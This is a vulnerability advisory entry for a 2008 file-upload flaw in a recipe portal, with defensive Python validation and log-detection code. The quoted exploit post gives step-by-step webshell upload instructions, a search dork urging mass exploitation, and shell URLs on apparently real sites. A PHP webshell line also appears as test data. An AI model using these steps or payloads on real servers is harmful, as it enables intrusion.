ScriptsFeed Recipes Listing Portal Arbitrary File Upload Vulnerability

Vulnerability ID: 1182065    Vulnerability type: Input validation
Published: 2009-08-12    Updated: 2009-08-12
CVE: CVE-2008-6943    CNNVD ID: CNNVD-200908-109
Platform: N/A    CVSS score: 6.5
|Sources
https://cxsecurity.com/issue/WLB-2009080108
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200908-109
|Vulnerability Details
Unrestricted file upload vulnerability in ScriptsFeed Recipes Listing Portal. A remote authenticated user can execute arbitrary code by uploading a file with an executable extension (for example .php) as a recipe photo and then fetching it with a direct request to the file under pictures/. As the exploit below shows, the upload keeps the client-supplied filename (prefixed with an id) and writes it into the web-served pictures/ directory, so the web server runs the uploaded file as a script.
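As an added example (not code from ScriptsFeed or from the advisory), the following Python models both sides of the issue: the vulnerable naming pattern that the exploit paths reveal (client filename kept under an id prefix in pictures/), and a hardened check that allowlists image extensions, verifies the file signature, rejects NUL bytes and directory components, and stores the file under a server-chosen random name. The sample uploads, the function names and the signature table are my own constructions.

```python
import os
import secrets

# Allowed image extensions and the file signatures each must start with.
ALLOWED_IMAGE_TYPES = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}


def vulnerable_store_path(upload_id, client_name):
    """The pattern the advisory exploits: the client-supplied filename is kept
    (prefixed with an id) and written into the web-served pictures/ directory,
    so 'c.php' becomes pictures/<id>c.php and runs as PHP when requested."""
    return f"pictures/{upload_id}{os.path.basename(client_name)}"


def validate_image_upload(client_name, content):
    """Hardened check: return a safe server-chosen filename or raise ValueError."""
    # Drop any directory component; treat backslashes as separators too.
    name = os.path.basename(client_name.replace("\\", "/"))
    if "\x00" in name:
        raise ValueError("NUL byte in filename")
    # Only the final extension is consulted; nothing else from the name is reused.
    ext = os.path.splitext(name)[1].lower()
    if ext not in ALLOWED_IMAGE_TYPES:
        raise ValueError(f"extension {ext!r} is not an allowed image type")
    if not any(content.startswith(sig) for sig in ALLOWED_IMAGE_TYPES[ext]):
        raise ValueError("content does not match the declared image type")
    # Random name plus validated extension: 'shell.php.jpg' cannot survive as a name.
    return f"{secrets.token_hex(16)}{ext}"


# Constructed sample uploads: (client-supplied filename, leading bytes of content).
SAMPLE_UPLOADS = [
    ("photo.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 16),     # legitimate JPEG
    ("c.php", b"<?php system($_GET['cmd']); ?>"),          # what the advisory uploads
    ("shell.php.jpg", b"<?php echo 'x'; ?>"),              # double extension, no image signature
    ("shell.jpg\x00.php", b"\xff\xd8\xff\xe0"),            # NUL-byte truncation attempt
    ("../../config.php", b"\xff\xd8\xff\xe0"),             # traversal in the name
]


def triage(uploads):
    """Run every sample through the hardened check; map name -> (verdict, detail)."""
    results = {}
    for client_name, content in uploads:
        try:
            results[client_name] = ("accepted", validate_image_upload(client_name, content))
        except ValueError as exc:
            results[client_name] = ("rejected", str(exc))
    return results


if __name__ == "__main__":
    print(vulnerable_store_path(1226598339, "c.php"))
    for name, (verdict, detail) in triage(SAMPLE_UPLOADS).items():
        print(f"{name!r:24} {verdict:8} {detail}")
```

The signature check does not stop a polyglot (a real JPEG header with PHP appended), so the random rename must be paired with a pictures/ directory that the web server never executes scripts from (for example `php_flag engine off` in a .htaccess under mod_php, or storing uploads outside the document root and serving them through a handler).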
|Exploit
[~] ScriptsFeed (SF) Recipes Listing Portal Remote File Upload
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 13.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] NOTE: Loneliness lost its meaning in my loneliness : ( (
[~]
[~] my bug number now: 39
[~]
[~] my target bug number: 100
[~]
[~] dork: allinurl:"recipedetail.php?id="  ( There are lots of sites, exploit them : ) )
[~]
[~] -----------------------------------------------------------


Exploit:

http://localhost/script/pictures/[id]your_shell.php

Register on the site:

register: http://localhost/script/register.php

Then log in to the site:

login: http://localhost/script/login.php

Then click "Add a Recipe" and add a recipe.

Then click "View your Recipes", click your recipe, and a new page opens.

Right-click your photo, select Properties, and copy the photo link.

Paste it into your browser to go to your shell.

your_shell.php path:

http://localhost/script/pictures/[id]your_shell.php



RFU for the demo:

user: zorlu

passwd: zorlu1

shell path:

http://www.scriptsfeed.com/demos/recipes_website_1/pictures/1226598339c.php



example 2: 

user: zorlu

passwd: zorlu1

shell:

http://onlineyemektarifi.com/pictures/1226598952c.php? ( don't index it right away, poke around the server )

example:

http://onlineyemektarifi.com/pictures/1226598952c.php?act=ls&d=%2Fetc%2Fvdomainaliases ( the sites on the server )


[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------
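From the defender's side, as an added example that is not part of the advisory, the following Python scans Apache combined-format access logs for requests to server-side scripts under the image upload directory, which is exactly the access pattern the walkthrough above produces (a GET to pictures/<id><name>.php, then the same URL with a command query string). The log lines are constructed, and the upload directory and extension lists are assumptions to adjust per deployment.

```python
import re
from urllib.parse import urlsplit

# Apache/nginx combined log format; only the fields the check needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Assumptions: where this app stores uploads, and which extensions the server would execute.
UPLOAD_DIRS = ("/pictures/",)
SCRIPT_EXTS = (".php", ".php3", ".php4", ".php5", ".phtml", ".phar")

# Constructed log excerpt shaped like the advisory's walkthrough (RFC 5737 test addresses).
SAMPLE_LOG = """\
203.0.113.5 - - [13/Nov/2008:18:45:41 +0000] "GET /script/pictures/1226598339c.php HTTP/1.1" 200 1532
203.0.113.5 - - [13/Nov/2008:18:46:02 +0000] "GET /script/pictures/1226598339c.php?act=ls&d=%2Fetc%2Fvdomainaliases HTTP/1.1" 200 4096
198.51.100.7 - - [13/Nov/2008:18:47:10 +0000] "GET /script/pictures/1226598400.jpg HTTP/1.1" 200 48211
198.51.100.7 - - [13/Nov/2008:18:47:12 +0000] "GET /script/recipedetail.php?id=3 HTTP/1.1" 200 9120
198.51.100.7 - - [13/Nov/2008:18:47:15 +0000] "GET /script/pictures/1226598400.jpg?x=1 HTTP/1.1" 200 48211
"""


def is_script_in_upload_dir(target):
    """True if the request path is a server-side script under an upload directory."""
    path = urlsplit(target).path.lower()
    return any(d in path for d in UPLOAD_DIRS) and path.endswith(SCRIPT_EXTS)


def find_upload_dir_script_hits(log_text):
    """Parse each line and return the requests that touch a script under pictures/."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        if not is_script_in_upload_dir(m["target"]):
            continue
        parts = urlsplit(m["target"])
        hits.append({
            "ip": m["ip"],
            "ts": m["ts"],
            "path": parts.path,
            "query": parts.query,
            "status": int(m["status"]),
        })
    return hits


if __name__ == "__main__":
    for hit in find_upload_dir_script_hits(SAMPLE_LOG):
        print(f"{hit['ts']}  {hit['ip']}  {hit['status']}  {hit['path']}  ?{hit['query']}")
```

A 200 on such a request means the server executed the file; the same path check run against the pictures/ directory on disk (any name ending in a script extension) tells you whether a shell is already present regardless of what the logs retained.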

|References

Source: XF
Name: recipeslistingportal-image-file-upload(46607)
Link: http://xforce.iss.net/xforce/xfdb/46607

Source: BID
Name: 32293
Link: http://www.securityfocus.com/bid/32293

Source: MILW0RM
Name: 7112
Link: http://www.milw0rm.com/exploits/7112

Source: SECUNIA
Name: 32690
Link: http://secunia.com/advisories/32690

Source: OSVDB
Name: 49960
Link: http://osvdb.org/49960